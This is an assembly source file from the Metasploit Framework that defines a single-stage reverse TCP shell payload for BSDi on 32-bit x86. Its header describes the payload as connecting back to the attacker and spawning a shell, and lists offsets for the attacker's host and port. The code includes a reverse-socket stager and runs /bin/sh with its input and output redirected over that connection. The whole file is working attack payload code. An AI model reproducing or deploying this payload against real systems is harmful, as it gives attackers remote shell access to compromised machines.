;; ; ; Name: single_reverse_tcp_shell ; Version: $Revision: 1633 $ ; License: ; ; This file is part of the Metasploit Exploit Framework ; and is subject to the same licenses and copyrights as ; the rest of this package. ; ; Description: ; ; Single reverse TCP shell. ; ; Meta-Information: ; ; meta-shortname=BSDi Reverse TCP Shell ; meta-description=Connect back to the attacker and spawn a shell ; meta-authors=skape ; meta-os=bsdi ; meta-arch=ia32 ; meta-category=single ; meta-connection-type=reverse ; meta-name=reverse_tcp_shell ; meta-basemod=Msf::PayloadComponent::ReverseConnection ; meta-offset-lhost=0x1c ; meta-offset-lport=0x23 ;; BITS 32 %define USE_SINGLE_STAGE 1 %define ASSUME_REG_EAX 0 %define ASSUME_REG_EDX 2 %include "stager_sock_reverse.asm" %include "generic.asm" shell: execve_binsh EXECUTE_REDIRECT_IO